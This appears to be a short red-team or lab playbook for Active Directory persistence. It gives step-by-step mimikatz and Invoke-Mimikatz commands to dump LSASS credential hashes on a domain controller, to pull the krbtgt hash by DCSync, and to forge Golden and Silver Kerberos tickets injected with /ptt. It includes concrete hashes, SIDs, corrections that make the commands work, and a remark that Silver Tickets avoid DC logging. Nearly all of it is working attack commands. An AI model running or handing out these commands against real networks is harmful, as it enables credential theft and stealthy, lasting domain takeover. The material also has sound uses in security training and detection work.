Persistence Flow

Persistence Technique: Golden Ticket:

Execute mimikatz on the DC. lsadump::lsa /patch patches LSASS and dumps the NTLM hashes of every domain account, including krbtgt, whose hash is what the Golden Ticket is signed with; privilege::debug is needed first to get SeDebugPrivilege:

mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch

The same dump through PowerSploit's Invoke-Mimikatz (add -ComputerName WIN-2RUMVG5JPOC to run it on the DC over PowerShell remoting instead of locally):

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

On any machine that can reach the DC (no admin rights needed, only the krbtgt hash and the domain SID), forge the TGT and inject it into the current logon session with /ptt. The /sid value must be the domain SID (S-1-5-21-X-Y-Z) without a trailing RID; the original command had -1001, an account RID, appended, which mimikatz does not expect because /id supplies the user RID. /groups:513 puts only Domain Users in the PAC; leave /groups out to get the default 512,513,518,519,520 set (Domain Admins, Domain Users, Schema Admins, Enterprise Admins, Group Policy Creator Owners):

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::golden /user:administrator /domain:security.local /sid:S-1-5-21-2515352101-914078745-3278884511 /krbtgt:30ca30e0cbc0f87b2f5bac01794a2357 /id:500 /groups:513 /ptt"'

Alternatively, the krbtgt hash can be pulled with DCSync, which asks a DC for the account over the directory replication protocol and never runs code on the DC. It needs an account with replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which Domain Admins hold by default:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"lsadump::dcsync /user:SECURITY\krbtgt"'

Persistence Technique: Silver Ticket:

A Silver Ticket is a forged service ticket (TGS) signed with the NTLM hash of the service account, here the domain controller's computer account (WIN-2RUMVG5JPOC$), obtained with lsadump::lsa /patch on the DC or with DCSync. Because the ticket is presented straight to the service and no TGT or TGS request goes to the KDC, nothing is logged on the DC for it. The command below forges a ticket for the cifs service on the DC and gives access to its shares. As with the Golden Ticket, /sid must be the domain SID without a trailing RID (the original had -502, the krbtgt RID, appended), and the option is /domain: with a single colon:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::golden /domain:security.local /sid:S-1-5-21-1200125816-2926698244-2119389380 /target:WIN-2RUMVG5JPOC.security.local /service:cifs /rc4:62e72bcfbac429fa51d15ec57caa506d /id:500 /user:administrator /ptt"'

@Saksham Dixit